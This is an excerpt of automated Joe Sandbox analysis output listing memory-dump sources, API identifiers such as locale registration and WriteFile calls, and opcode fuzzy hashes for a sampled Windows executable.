                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                    • String ID:
                                                                                                    • API String ID: 3936042273-0
                                                                                                    • Opcode ID: 2ef972a16e2ba5ba3c98391287ce00b58c1d51af4b9df70177021faff77ee253
                                                                                                    • Instruction ID: 667315b5090b0c18c2fd26e9306f67de2fba29de337aa793c33e55d1b5b23ee4
                                                                                                    • Opcode Fuzzy Hash: 2ef972a16e2ba5ba3c98391287ce00b58c1d51af4b9df70177021faff77ee253
                                                                                                    • Instruction Fuzzy Hash: 2C41F6A2B0674981FF18AB65D41437CA292DF5CFE0F984A71DE6D077C4DF6CA9818320
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_RegisterSetgloballocalestd::locale::_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3698853521-0
                                                                                                    • Opcode ID: c9a1a8139d8810aad24f7145a6566e187178f19033a855930054ed48ba3ff1cb
                                                                                                    • Instruction ID: 74423f839aa0da83742236dabe68f93cb5c6cc8e49910020282109f69cb46c39
                                                                                                    • Opcode Fuzzy Hash: c9a1a8139d8810aad24f7145a6566e187178f19033a855930054ed48ba3ff1cb
                                                                                                    • Instruction Fuzzy Hash: 30419222618B4591FB54EF21E4402B9B3A5FF88B90F9C09B1EA9D47795DF3CE842C720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$LockitLockit::_$Concurrency::cancel_current_taskFacet_Register
                                                                                                    • String ID:
                                                                                                    • API String ID: 1168246061-0
                                                                                                    • Opcode ID: 73d040060e39de7473f733929aeeb815445ca65359d0c265211a911782271014
                                                                                                    • Instruction ID: d124f47664cfbb6443ec2b366dcef143b7760764ede55c74b5bed9d1b6ded136
                                                                                                    • Opcode Fuzzy Hash: 73d040060e39de7473f733929aeeb815445ca65359d0c265211a911782271014
                                                                                                    • Instruction Fuzzy Hash: 2741D226A18A4181FB11EF15E44027AA3A1FFACF94F9C09B5EA4D477A5DF3DE041C720
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 442123175-4171548499
                                                                                                    • Opcode ID: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
                                                                                                    • Instruction ID: e375cefd4d56d0303066503ce918030ad895038f4254374f60d15c1fbe0110de
                                                                                                    • Opcode Fuzzy Hash: 136ebf252562798dd94b0934f5b608a87eddbdd1c89cb1577b5bf7720501d192
                                                                                                    • Instruction Fuzzy Hash: B941C322B18A4182EB60EF25E8443AAA7A1FF8C794F894531EE4E87794DF7CD441CB50